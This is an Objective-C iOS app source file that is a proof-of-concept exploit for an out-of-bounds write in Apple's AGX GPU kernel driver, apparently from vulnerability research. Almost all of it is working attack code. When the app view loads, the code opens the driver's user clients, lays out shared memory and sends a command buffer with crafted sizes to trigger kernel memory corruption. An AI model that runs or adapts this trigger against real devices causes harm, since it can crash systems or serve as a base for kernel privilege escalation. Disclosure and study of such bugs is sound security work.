//
//  ViewController.m
//  IOAccelCommandQueue2::processSegmentKernelCommand OOB write
//
//  Created by Brandon Azad on 12/5/19.
//  Copyright © 2019 Brandon Azad. All rights reserved.
//

#import "ViewController.h"

static void poc(void);

@interface ViewController ()

@end

@implementation ViewController

- (void)viewDidLoad {
	[super viewDidLoad];
	dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
		poc();
		usleep(100000);
		exit(1);
	});
}

@end


#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <pthread.h>

typedef mach_port_t io_object_t;
typedef io_object_t io_connect_t;
typedef io_object_t io_service_t;
typedef char io_name_t[128];

#define IO_OBJECT_NULL	(MACH_PORT_NULL)
extern const mach_port_t kIOMasterPortDefault;
kern_return_t IOObjectGetClass(io_object_t object, io_name_t className);
kern_return_t IOObjectRelease(io_object_t object);
io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect);
kern_return_t IOServiceClose(io_connect_t connect);
CFMutableDictionaryRef IOServiceMatching(const char *name ) CF_RETURNS_RETAINED;
kern_return_t IOConnectAddClient(io_connect_t connect, io_connect_t client);
kern_return_t IOConnectCallMethod(mach_port_t connection, uint32_t selector, const uint64_t *input, uint32_t inputCnt, const void *inputStruct, size_t inputStructCnt, uint64_t *output, uint32_t *outputCnt, void *outputStruct, size_t *outputStructCnt) AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;
kern_return_t IOConnectCallAsyncMethod(mach_port_t connection, uint32_t selector, mach_port_t wake_port, uint64_t *reference, uint32_t referenceCnt, const uint64_t *input, uint32_t inputCnt, const void *inputStruct, size_t inputStructCnt, uint64_t *output, uint32_t *outputCnt, void *outputStruct, size_t *outputStructCnt) AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;

const int AGXCommandQueue_type = 4;
const int IOAccelSharedUserClient2_type = 2;
const int IOAccelSharedUserClient2_create_shmem_selector = 5;
const int AGXCommandQueue_set_notification_port_selector = 0;
const int AGXCommandQueue_submit_command_buffers_selector = 1;

struct IOAccelDeviceShmemData {
	void *data;
	uint32_t length;
	uint32_t shmem_id;
};

struct IOAccelCommandQueueSubmitArgs_Header {
	uint32_t _unk_1;
	uint32_t count;
};

struct IOAccelCommandQueueSubmitArgs_Command {
	uint32_t command_buffer_shmem_id;
	uint32_t segment_list_shmem_id;
	uint64_t notify_1;
	uint64_t notify_2;
};

struct IOAccelSegmentListHeader {
	uint32_t field_0;
	uint32_t field_4;
	uint32_t segment_count;
	uint32_t length;
};

struct IOAccelSegmentResourceList_ResourceGroup {
	uint32_t resource_id[6];
	uint8_t field_18[48];
	uint16_t resource_flags[6];
	uint8_t field_54[2];
	uint16_t resource_count;
};

struct IOAccelSegmentResourceListHeader {
	uint64_t field_0;
	uint32_t kernel_commands_start_offset;
	uint32_t kernel_commands_end_offset;
	int total_resources;
	uint32_t resource_group_count;
	struct IOAccelSegmentResourceList_ResourceGroup resource_groups[];
};

struct IOAccelKernelCommand {
	uint32_t type;
	uint32_t size;
};

struct IOAccelKernelCommand_CollectTimeStamp {
	struct IOAccelKernelCommand command;
	uint64_t timestamp;
};

static struct IOAccelDeviceShmemData *
IOAccelSharedUserClient2_create_shmem(io_connect_t IOAccelSharedUserClient2, size_t size) {
	struct IOAccelDeviceShmemData *shmem = malloc(sizeof(*shmem));
	assert(shmem != NULL);
	size_t out_size = sizeof(*shmem);
	uint64_t shmem_size = size;
	kern_return_t kr = IOConnectCallMethod(IOAccelSharedUserClient2,
			IOAccelSharedUserClient2_create_shmem_selector,
			&shmem_size, 1,
			NULL, 0,
			NULL, NULL,
			shmem, &out_size);
	assert(kr == KERN_SUCCESS);
	return shmem;
}

static void
AGXCommandQueue_set_notification_port(io_connect_t AGXCommandQueue, mach_port_t notification_port) {
	kern_return_t kr = IOConnectCallAsyncMethod(AGXCommandQueue,
			AGXCommandQueue_set_notification_port_selector,
			notification_port,
			NULL, 0,
			NULL, 0,
			NULL, 0,
			NULL, NULL,
			NULL, NULL);
	assert(kr == KERN_SUCCESS);
}

static void
AGXCommandQueue_submit_command_buffers(io_connect_t AGXCommandQueue,
		const struct IOAccelCommandQueueSubmitArgs_Header *submit_args,
		size_t size) {
	kern_return_t kr = IOConnectCallMethod(AGXCommandQueue,
				 AGXCommandQueue_submit_command_buffers_selector,
				 NULL, 0,
				 submit_args, size,
				 NULL, NULL,
				 NULL, NULL);
	assert(kr == KERN_SUCCESS);
}

static void *
notification_recv_func(void *arg) {
	mach_port_t notification_port = (mach_port_t)(uintptr_t)arg;
	for (;;) {
		struct {
			mach_msg_header_t hdr;
			uint8_t data[0x4000];
		} msg = {};
		kern_return_t kr = mach_msg(&msg.hdr, MACH_RCV_MSG, 0,
				sizeof(msg), notification_port,
				MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
		if (kr == KERN_SUCCESS) {
			int error = *(int *)((uint8_t *)&msg + 0x94);
			uint64_t notify = *(uint64_t *)((uint8_t *)&msg + 0x64);
			printf("notification %llx: error = %d\n", notify, error);
		}
	}
}

static void
poc() {
	kern_return_t kr;

	io_service_t AGXAccelerator = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AGXAccelerator"));
	assert(AGXAccelerator != IO_OBJECT_NULL);
	io_connect_t AGXCommandQueue = MACH_PORT_NULL;
	IOServiceOpen(AGXAccelerator, mach_task_self(), AGXCommandQueue_type, &AGXCommandQueue);
	assert(AGXCommandQueue != IO_OBJECT_NULL);
	io_connect_t IOAccelSharedUserClient2 = MACH_PORT_NULL;
	IOServiceOpen(AGXAccelerator, mach_task_self(), IOAccelSharedUserClient2_type, &IOAccelSharedUserClient2);
	assert(IOAccelSharedUserClient2 != IO_OBJECT_NULL);

	kr = IOConnectAddClient(AGXCommandQueue, IOAccelSharedUserClient2);
	assert(kr == KERN_SUCCESS);

	struct IOAccelDeviceShmemData *command_buffer_shmem = IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2, 0x4000);
	struct IOAccelDeviceShmemData *segment_list_shmem = IOAccelSharedUserClient2_create_shmem(IOAccelSharedUserClient2, 0x4000);

	mach_port_t notification_port = 0;
	mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &notification_port);
	AGXCommandQueue_set_notification_port(AGXCommandQueue, notification_port);

	pthread_t notification_recv_thread;
	pthread_create(&notification_recv_thread, NULL, notification_recv_func, (void *)(uintptr_t)notification_port);

	struct {
		struct IOAccelCommandQueueSubmitArgs_Header header;
		struct IOAccelCommandQueueSubmitArgs_Command command;
	} submit_args = {};
	submit_args.header.count = 1;
	submit_args.command.command_buffer_shmem_id = command_buffer_shmem->shmem_id;
	submit_args.command.segment_list_shmem_id   = segment_list_shmem->shmem_id;

	struct IOAccelSegmentListHeader *slh = (void *)segment_list_shmem->data;
	slh->length = 0x100;
	slh->segment_count = 1;
	struct IOAccelSegmentResourceListHeader *srlh = (void *)(slh + 1);
	srlh->kernel_commands_start_offset = 0;
	srlh->kernel_commands_end_offset = 0x4000;

	struct IOAccelKernelCommand_CollectTimeStamp *cmd1 = (void *)command_buffer_shmem->data;
	cmd1->command.type = 2;
	cmd1->command.size = 0x4000 - 8;
	struct IOAccelKernelCommand_CollectTimeStamp *cmd2 = (void *)((uint8_t *)cmd1 + cmd1->command.size);
	cmd2->command.type = 2;
	cmd2->command.size = 8;

#define KTRW 0

	printf("AGXCommandQueue::submit_command_buffers()\n");
#if KTRW
	sleep(4);
#endif
	AGXCommandQueue_submit_command_buffers(AGXCommandQueue, &submit_args.header, sizeof(submit_args));
	printf("timestamp = %llx\n", cmd1->timestamp);
#if KTRW
	sleep(4);
#endif
}

